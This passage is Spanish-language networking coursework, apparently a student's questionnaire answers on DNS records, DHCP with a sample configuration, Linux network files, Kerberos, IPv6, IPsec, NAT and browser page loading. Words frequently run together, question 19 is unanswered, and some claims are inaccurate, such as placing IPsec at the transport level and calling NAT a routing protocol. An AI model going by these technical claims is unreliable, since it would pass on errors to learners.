Se llaman Registros de Recurso (RR). Cada registro tiene un tipo asociado que describeel dato que contiene, y una clase que especifica el tipo de red al que se aplica. Estoúltimo se adapta a diferentes esquemas de dirección, como direcciones IP (la clase IN),direcciones Hesiod (utilizadas por el sistema Kerberos del MIT) y algunas más. El RRtípico es el registro A, que asocia un nombre completamente cualificado con unadirección IP.
11.-Como funciona el protocolo DHCP, cuales son los pasos para asignar y liberardirecciones, y que tipo de paquetes regresa.
DHCP define mecanismos por los cuales, los clientes pueden recibir direcciones de reden alquiler (lease) por un período limitado de tiempo, permitiendo una reasignación enserie de la dirección a diferentes clientes, además de proveer mecanismos paraadquirir todos los parámetros de configuración IP necesarios para operar en la red(Default Gateway, DNS, máscara de red, etc.).
Diagrama de asignación:
36
Archivo /etc/DHCPd.conf:
default-lease-time 86400;max-lease-time 100000;authoritative;ddns-update-style none;
subnet 192.168.0.0 netmask 255.255.255.0 {range 192.168.0.50 192.168.0.90;option routers 192.168.0.100;}
12.-Para que se utilizan los siguientes archivos, y que relación tienen con el TCP/IP, ycon los temas vistos en clase. Mostrar la salida de esos archivos, de un servidor Linux, ode la ejecución del comando.
/etc/hosts.- contiene información de las diferentes máquinas de la red local a la quepertenece el sistema que lo contiene. Por medio de él se administran de maneracentralizada todos los hosts locales y contiene la tabla de correspondencias entre lasdirecciones IP y los nombres simbólicos de los equipos de la red.
/etc/protocols .- Contiene información de los protocolos usados en la red y cada una desus líneas contiene información referente a un protocolo (Nombre, número, alias).
37
Cuando un datagrama llega a su dirección destino, la capa de IP sabe que eldatagrama debe entregarse a alguno de los protocolos de transporte de las capassuperiores. Para decidir que protocolo deberá recibir el datagrama, IP busca elnúmero de protocolo del datagrama.
/etc/services.- Contiene información acerca de los servicios conocidos usados en la redIP. Cada entrada da información de un servicio. El formato es el siguiente:
echo 7/tcpque indica:
el nombre del servicio (echo) número de puerto/nombre del protocolo lista de alias (opcional)
hostname.- devuelve el nombre de la maquinahostid.- devuelve la dirección IP o Física de la maquina local.
13.-Como funciona el protocolo NETBIOS de Windows 2000 Server
Es un protocolo de resolución de nombres que puede ser encapsulado sobre TCP/IP.NetBIOS funciona a nivel de la capa de aplicación, dando una apariencia uniforme atodas las redes Windows independientemente de los protocolos que se hayan utilizadopara las capas de red y transporte. Permite compartir archivos e impresoras así comover los recursos disponibles en Entorno de red.
14.- Como funciona el protocolo kerberos
Kerberos es diferente de los métodos de autenticación de nombre deusuario/contraseña. En vez de validar cada usuario para cada servicio de red,Kerberos usa encriptación simétrica y un tercero, un KDC, para autentificar losusuarios a un conjunto de servicios de red. Una vez que el usuario se ha autentificadoal KDC, se le envía un ticket específico para esa sesión de vuelta a la máquina delusuario y cualquier servicio kerberizado buscará por el ticket en la máquina delusuario en vez de preguntarle al usuario que se autentifique usando una contraseña.Cuando un usuario en una red kerberizada se registra en su estación de trabajo, suprincipal se envía al KDC en una petición para un TGT desde el servidor deautenticación (AS). Esta petición puede ser enviada por el programa de conexión paraque sea transparente al usuario o puede ser enviada por el programa kinit después deque el usuario se registre.
El KDC verifica el principal en su base de datos. Si lo encuentra, el KDC crea unTGT,el cual es encriptado usando las llaves del usuario y devuelto al usuario.El
38
programa login en la máquina del cliente o kinit descifra el TGT usando lacontraseña del usuario La contraseña del usuario es usada únicamente en la máquinadel cliente y no es enviada sobre la red. El TGT, se configura para que caduquedespués de un cierto período de tiempo (usualmente 10 horas) y es almacenado en lacaché de credenciales de la máquina del cliente. Se coloca un tiempo de caducidad demanera que un TGT comprometido sólo es de utilidad para un intruso por un períodocorto de tiempo. Una vez que el TGT es emitido, el usuario no tiene que reingresar lacontraseña al KDC sino hasta que el TGT caduque o se desconecte y vuelva aconectarse. Cuando el usuario necesita acceder a un servicio de red, el software clienteusa el TGT para pedir un nuevo ticket para ese servicio en específico al servidor deotorgamiento de tickets, TGS. El ticket para el servicio es usado para autentificar elusuario a ese servicio de forma transparente.
15.-Cuales son las características del protocolo IP V6, y su futuro de aplicación.
espacio de direcciones prácticamente infinito; posibilidad de autoconfiguración decomputadoras y ruteadores; soporte para seguridad, computación movil, calidad deservicio; un mejor diseño para el transporte de tráfico multimedia en tiempo real,aplicaciones anycast y multicast; así como la posibilidad de transición gradual de IPv4a IPv6.
16 Como funciona el protocolo IPSEC.
Asegura la confidencialidad, integridad y la autenticidad, permitiendo comunicacionesseguras atravez de internet con independencia de las aplicaciones y protocolossuperiores, no añade seguridad a nivel aplicación si no a nivel de transporte, por lo quees no es incompatible con los algoritmos que proveeen dicha seguridad a nivelaplicación.
17.-Como funcionan los comandos PATHPUNG y NETDIAG.
El comando pathping envía paquetes a cada enrutador de la ruta hasta el destino finaldurante un período de tiempo y, a continuación, calcula los resultados en función de lospaquetes devueltos en cada salto. Puesto que el comando muestra el nivel de pérdidasde paquetes en un vínculo o enrutador específicos, es sencillo determinar quéenrutadores o vínculos podrían estar causando problemas en la red.NETDIAG sirve para hacer una serie de test a nivel de red y conexiones en el DC quese lanza
18.-Como funciona el protocolo NAT, mencione sus aplicaciones, un diagrama de unared y host que incluyan NAT en su fincionamiento.
NAT es un protocolo de encaminamiento (RFC 1631) mediante el cual un dispositivoconectado a Internet puede compartir la conexión. El protocolo proporciona estafuncionalidad mediante la traducción del encabezado IP del protocolo TCP y depaquetes UDP a partir de direcciones IP de la red interna hasta una dirección única deencaminamiento de la interfaz conectada a Internet.Además la tecnología NAT permite establecer y aumentar la seguridad de las redeslocales, ya que los servidores de Internet no pueden obtener las direcciones privadas
39
asignadas a los equipos que se encuentran protegidos por el dispositivo que actúa deNAT.
19.-Explique capa por capa, como funcionaría el NAT, cuando un host desea navegar enInternet, como interviene el NAT, el DNS, http, TCP, IP, y todos los protocolos queintervienen.
20.- Según los temas tratados en clase, y en el cuestionario. Cuales son los pasos quesigue un navegador al momento en que tecleamos una dirección, para realizar unaconexión con la pagina y obtener la información. Explicar y describir cada uno de lospasos.
Primeramente el cliente que en este caso seriamos nosotros, al dar Enter, enviaríamosuna solicitud de conexión con el puerto 80 al servidor donde se encuentra la paginasolicitada, esta solicitud viajaría por cada una de las siete capas del modelo OSIempezando por la capa de aplicación ya que es ahí donde se localiza el protocolo http,de aquí pasa a la capa de presentación para formatear los datos y puedan ser leídospor cualquier computadora, después pasa por la capa de sesión para que se establezcael enlace o sesión entre el nosotros y el servidor, inmediatamente después pasa a lacapa de transporte la cual se encargara de que la comunicación sea confiable medianteel protocolo TCP para que en la capa de red se encaminen y se entreguencorrectamente mediante la IP, cuando los datos llegan a la capa de enlace se corrigenlos posibles errores y se identifica el tipo de red (ethernet, token ring, etc) y se pasan ala capa física que es donde se mandan los datos por el cable UTP o cualquier otromedio físico, así los datos pasan al servidor llegando primero a la capa física ydespués pasando a la capa de enlace para corregir errores y los manda a la capa dered para que determine la ruta que deben seguir los datos, y después pasan a la capade transporte que regula el flujo de los datos y así pasa a la capa de sesión y si noexiste ningún se acepta la petición y se pasa ala siguiente capa la de presentación lacual traduce los datos y la capa de aplicación lee los datos del cliente y el servidormanda la confirmación y después la pagina.
